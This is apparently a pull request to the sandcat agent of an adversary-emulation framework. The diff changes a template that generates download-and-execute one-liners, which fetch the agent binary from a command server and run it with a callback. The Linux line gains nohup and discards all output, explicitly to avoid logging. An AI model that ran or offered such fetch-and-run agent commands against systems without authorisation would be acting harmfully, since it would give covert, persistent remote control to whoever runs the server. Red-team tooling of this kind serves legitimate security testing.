### PR TITLE
Prepend nohup to sandcat Linux one-liner

### DIFF
--- a/templates/sandcat.html
+++ b/templates/sandcat.html
@@ -85,7 +85,7 @@
             } else if(selected_option === 'windows-cmd') {
                 x.text('$url="'+loc+'/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform", "windows"); $wc.Headers.add("file", "sandcat.go"); $output="C:\\Users\\Public\\sandcat.exe"; $wc.DownloadFile($url, $output); cmd.exe /c C:\\Users\\Public\\sandcat.exe -server '+loc+' -group my_group -executors cmd -v;')
             } else if (selected_option === 'linux') {
-                x.text('curl -sk -X POST -H \'file:sandcat.go\' -H \'platform:linux\' '+loc+'/file/download > /tmp/sandcat-linux && chmod +x /tmp/sandcat-linux && /tmp/sandcat-linux -server '+loc+' -group my_group -v;');
+                x.text('curl -sk -X POST -H \'file:sandcat.go\' -H \'platform:linux\' '+loc+'/file/download > /tmp/sandcat-linux && chmod +x /tmp/sandcat-linux && nohup /tmp/sandcat-linux -server '+loc+' -group my_group -v >/dev/null 2>&1;');
             } else if (selected_option === 'darwin') {
                 x.text('curl -sk -X POST -H \'file:sandcat.go\' -H \'platform:darwin\' '+loc+'/file/download > /tmp/sandcat-darwin && chmod +x /tmp/sandcat-darwin && /tmp/sandcat-darwin -server '+loc+' -group my_group -v;');
             }


### PR DESCRIPTION
### Issue
The bash [one-liner](https://github.com/mitre/sandcat/blob/master/templates/sandcat.html#L88) generated for sandcat Linux agents will result in shells/terminals dying from the signal SIGHUP when a terminal exits or dies. In a scenario where a remote connection dies, this would result in the agent dying as well.

### Potential Solution
By prepending [nohup](https://linux.die.net/man/1/nohup) to the one-liner, hang-up signals (SIGHUP) are ignored.
All output is redirected to /dev/null to avoid any logging. 

A video example can be found [here](https://youtu.be/6I5yI92CUlg).


